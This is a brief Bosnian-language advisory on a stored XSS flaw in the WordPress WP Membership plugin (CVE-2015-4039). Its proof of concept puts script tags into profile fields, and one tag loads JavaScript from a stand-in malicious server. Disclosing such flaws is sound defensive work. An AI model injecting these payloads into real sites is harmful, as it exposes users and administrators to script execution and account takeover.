WordPress WP Membership plugin XSS ranjivost

WordPress WP Membership plugin XSS ranjivost

WordPress je popularni blog / content management sistem. U WP Membership pluginu je otkrivena XSS ranjivost koja pogađa sve korisnike određene instalacije, uključujući i administratore. Konkretno, sva input polja koje koriste registrovani korisnici nisu dobro obrađena u smislu ubrizgavanja malicioznog koda.

Primjer (Proof of concept):

* Prijavite se kao registrovani korisnik

* Popunite bilo koje polje u vašem profilu dodajući na kraju sljedeće:

                `<script>alert("XSS");</script>`

                ili

                `<script src=”http://malicious .server/my_malicious_script.js”/>`

Rješenje

Još uvijek nema službenog updatea na ovu ranjivost.

Izvor:panVangeas

Značaj ranjivosti:HITNO

Platforma:BSD UNIX

CVE oznaka:CVE-2015-4039

Leave a Reply